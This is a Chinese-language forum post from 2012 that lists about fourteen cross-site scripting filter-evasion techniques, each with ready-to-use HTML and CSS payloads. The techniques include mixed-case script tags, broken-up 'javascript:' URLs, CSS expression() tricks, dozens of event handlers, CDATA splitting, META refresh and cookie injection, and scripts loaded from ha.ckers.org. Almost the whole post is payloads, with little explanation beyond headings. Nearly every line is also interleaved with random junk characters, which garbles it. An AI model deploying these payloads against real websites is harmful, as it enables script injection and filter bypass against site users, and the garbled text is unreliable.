1. 改变字符大小写 T d) l1 }* E
1 _* P& E6 b$ r0 v& D! B
4 T1 Q2 ^5 ^ k" `( N7 A5 a% i- c! H- q3 Q7 u. v% w
<sCript>alert(‘d’)</scRipT>
8 L' U9 f; ~6 v* t/ D0 ~- A0 Q- \
# f# E0 V* x! }" B; p" _2. 利用多加一些其它字符来规避Regular Expression的检查
" d" a8 t2 V p1 l& E/ `* N
- C6 D: B( W! \+ X <<script>alert(‘c’)//<</script>
' H$ j# q1 X1 s+ n* R
0 V) \4 ?- d5 O <SCRIPT a=">" SRC="t.js"></SCRIPT>4 U/ m9 Q# S3 W; a5 @
1 W) x7 K' a; z* k0 K# z <SCRIPT =">" SRC="t.js"></SCRIPT>
( S7 V- l7 F) H2 t7 d% ]- o! U1 J% r
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
" D, v Z/ W* A* C! u
. u' h7 E5 ? j <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
/ q2 a3 Q+ Z7 z
( r2 l7 Y1 M# A/ W0 B6 _& U' k <SCRIPT a=`>` SRC="t.js"></SCRIPT>" d E9 O+ Z3 M* H
0 b: D* e" B* R1 q( s <SCRIPT a=">’>" SRC="t.js"></SCRIPT>" g! z5 z3 I0 h# m- F3 J
. y+ J- T" f( P9 w+ V
3. 以其它扩展名取代.js" L1 _8 j2 }* L- h3 M( j4 e
3 |" m) f9 f5 X% A* Z- y- y <script src="bad.jpg"></script>
& g$ s' f9 y$ T$ U9 v
6 O* S5 L# E) Z) j# e3 S4. 将Javascript写在CSS档里
$ l( I9 g/ n( {8 O+ L
% U+ m9 N/ `9 S# @ <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">, P. b* W2 k1 o+ q# v# j0 M
& q4 L2 c) I$ F A$ }
example:; q; B( c' ?! y2 z! A
! u* X- Q0 j8 D6 o, E! X
body {- X" Z; [( z+ m: M
% B% Y% X7 u1 n: I- Z
background-image: url(‘javascript:alert("XSS");’)
# Y X+ S& G# x( y& r" h1 Y
8 @: y. k' ?1 i! H. o6 O }
1 I1 _3 h. W8 r+ n; B, G' C1 b+ g
, ]6 Q( ^8 [6 x0 a7 _3 v& M5. 在script的tag里加入一些其它字符
: B1 p* F: R: I! O4 ~8 p2 }0 Q; C3 L6 ~! o
<SCRIPT/SRC="t.js"></SCRIPT>
, r: f2 m" d# }1 I) |3 l; N/ Q3 ?. r- {( {: P# Q, _
<SCRIPT/anyword SRC="t.js"></SCRIPT>/ G: U% }* L5 m: ?
; @# t. e6 b8 F
6. 使用tab或是new line来规避
- n! z2 |7 F7 ~! P k6 A. Q5 P6 M; f6 w, N- R$ T
<img src="jav ascr ipt:alert(‘XSS3′)">8 p% Z! k4 C' s+ _
1 {- e; G/ K& ^
<img src="jav ascr ipt:alert(‘XSS3′)">
, x# ~" G% B. k. D3 w
8 v0 _# O1 W- r# ]0 n <IMG SRC="jav ascript:alert(‘XSS’);">+ h# x; K a! C; d' X9 k
# P3 t9 z x+ e3 [$ w; L
-> tag2 V0 M W8 h& e9 U7 W% H
9 q$ D* V+ \: [1 Y% T
-> new line
4 s4 l+ q% N5 L
# {0 ?. R4 [3 r* c6 L: w7. 使用"\"来规避; b- `' L: ~: S/ v* q# z
) x9 y J8 T, N! ^6 H: s. G
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
- ^. E0 ^! z+ W+ H) k2 X4 H9 {- r. Y8 c- K( M
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
; w2 n" Y8 c8 z) _$ h" z% {% w( S$ C9 { l
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">/ S `7 H+ _' L; c4 j4 |- @' P
' y# b" v& A1 q4 E, L. J
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 z4 W8 B* v$ l3 D4 B! h$ p3 H8 {4 f8 A3 O9 X/ H2 |+ f' T
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
/ p5 Q* h# F" b a: t) A, t
1 j8 `/ t) v( Q3 z4 `# x c% X( L8. 使用Hex encode来规避(也可能会把";"拿掉). u9 F: V) P; r# j1 V2 Y- t
! r5 Z E3 p( s- q8 b9 f, ~) m <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
0 ]7 t, _3 L. F3 _. Z0 E I1 n" u& B
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
2 ?! C c$ o1 f+ |5 i) F2 _; x8 u8 v; M7 M0 ^; t+ P+ E
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">& }4 n, |& ?* o$ S9 B! d
. L' b1 ~ n7 u. p% _" A# w( n 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
5 n. n( Z6 A# {* n$ R8 y3 F* \% _0 @5 ~/ s: d9 X7 @. A
9. script in HTML tag- i5 x5 {. L5 W Z; V3 t
+ Z' P; `7 y7 m- x <body onload=」alert(‘onload’)」>4 I' T, E4 A) l8 d. g
6 E( I3 p @& v5 i: i$ d
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
; |; w( m, ~0 D7 r% D* K; H5 M3 ?* y0 D3 v( K
10. 在swf里含有xss的code7 h- ?) r2 Q, f# p2 p e4 a
) j; j+ {: i J; V o) l1 V+ V; q <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
. E) P: p8 w" i7 G. c" J5 t
$ o0 T. e5 Z0 F) J11. 利用CDATA将xss的code拆开,再组合起来。
- n9 P2 @9 b3 D% j6 q3 T
) @( ^$ b3 {- Z, i) K! O <XML ID=I><X><C>
' N( g/ |! _) e+ y/ ~, o" V# j( |; X% ^) `
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
4 E `) Q- }' a L6 u/ e" K
" g; V) ^, l- v+ \6 m- b </C></X>
" h% j* b& Z. N4 M% Y# L/ n: Q" q
6 H4 B* b2 [' l- D) \6 \; T: Q4 | </xml>
' y) t' }( }4 |, h( }" y4 e; h9 ]8 ~1 Z$ X4 J; A: l. O' |
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>+ H0 C3 `1 A D- j) u3 ?
2 ], J. A( o# U3 o9 W- s! Z& f/ s0 N <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>8 z8 z$ V1 A9 w0 T
) d4 |5 }* E# u& l4 ~$ D) {0 c- s <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>5 ~3 J3 ^4 d: t+ `
$ u$ G- z4 R. g7 C( q/ V& y. F, B12. 利用HTML+TIME。
7 @ F8 I5 Z1 _3 A/ |4 m" L6 v! i1 N, G" u% H4 R4 T- m: P
<HTML><BODY>
: g9 O$ v* l9 j. u, j; }) W' |9 V6 u" h% C: B! s
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"># \- X6 L$ Z/ e) k2 a% s
0 ]+ E3 S5 T8 ?* b& E8 I
<?import namespace="t" implementation="#default#time2">
7 H! W; G+ T% ?0 \4 V# C
$ [( M; c' w" A% J <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">, k% Z3 }2 q& H
( \2 L @* R8 g9 C7 C
</BODY></HTML>
6 ^6 x: ~" ?4 k6 ~/ Z V$ ~/ E
# X5 E& w& t1 y2 ~; Z+ S13. 透过META写入Cookie。& h9 r0 n9 H: @0 ~1 A2 s
; c5 a1 n- g3 L% d0 Z; a/ P5 d) i0 H/ M <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">% q3 G( L" F0 \8 U9 j9 N
% v0 R9 M( t# _$ E1 D4 Y8 w
14. javascript in src , href , url3 L3 K; k) }* v7 y* H. F/ C+ J
) _9 x# l% `9 h) ? <IFRAME SRC=javascript:alert(’13′)></IFRAME>
0 I; ~7 E5 J s6 F8 h3 ~) b$ p& p( J g/ S' G) H8 z# ~
<img src="javascript:alert(‘XSS3′)">& q' X4 R. e' U: a+ ]3 e/ l# F2 f
. E" A1 q& v0 H6 {" |% }<IMG DYNSRC="javascript:alert(‘XSS20′)">. U- {0 e5 G# u; o( h3 ]' D
( m4 u5 \9 Z) h5 n6 @7 M6 {- s/ h <IMG LOWSRC="javascript:alert(‘XSS21′)">% V* P" A8 ?* f
/ a$ \, l! M8 L; A <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
- X9 |4 P. s: y6 Z7 u( I2 I' W7 D
/ m& q3 c- d- r& f2 d I! u; o: _ M <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
& @ X# O* K& ^: x+ G; f7 q& H# b4 w4 Q# O1 I% R* B- a2 I
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">, Q8 j/ }) T1 S
7 k8 ~$ d9 F6 h N" D$ R3 X <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
; F* e6 x% Q$ w- X0 t! r: w; I- |) g+ H! y
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}9 H- ?. I7 E% }- C
# U9 g/ {) _' ?2 b+ J9 y
</STYLE><A CLASS=XSS></A>
+ P1 e: v2 _. P% _
7 p! A/ r$ }! x; S- g- v. d <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
3 S! A! E! `5 p1 s! `+ _; L# d1 R+ `0 h% g: v* v6 a3 F: d
|
发表于 2012-12-31 09:59:28
收藏
支持
反对